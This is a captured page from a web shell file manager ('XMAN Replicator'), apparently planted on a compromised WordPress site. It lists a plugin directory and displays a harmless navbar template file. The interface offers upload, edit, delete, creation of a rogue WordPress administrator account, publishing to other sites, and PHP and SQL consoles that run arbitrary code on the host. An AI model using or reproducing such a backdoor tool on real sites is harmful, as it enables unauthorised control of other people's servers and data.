🛸 XMAN Replicator
English
Русский
Français
Quit
Path:
/
home
/
rlinfolily
/
www
/
wp-content
/
plugins
/
js_composer
/
include
/
templates
/
editors
/
navbar
/
📋 نشر إلى المواقع
👤 إنشاء مشرف WP
Upload
Make directory
Name
Size
Rights
Date
Actions
[.]
<DIR>
drwx---r-x
2016-04-15 18:01
🔄
🗑️
🗑️📁
⬇️
🔒
[..]
<DIR>
drwx---r-x
2016-04-15 18:01
🔄
🗑️
🗑️📁
⬇️
🔒
navbar.tpl.php
432 B
-rw----r--
2016-04-15 18:01
✏️
🔄
🗑️
⬇️
🔒
View: navbar.tpl.php
<?php if ( ! defined( 'ABSPATH' ) ) { die( '-1' ); } ?> <div class="<?php echo isset( $css_class ) && ! empty( $css_class ) ? esc_attr( $css_class ) : 'vc_navbar' ?>" role="navigation" id="vc_navbar"> <div class="vc_navbar-header"> <?php echo $nav_bar->getLogo() ?> </div> <ul class="vc_navbar-nav"> <?php foreach ( $controls as $control ) : echo $control[1]; endforeach; ?> </ul> <!--/.nav-collapse --> </div>
PHP Console
Execute
SQL Console
Execute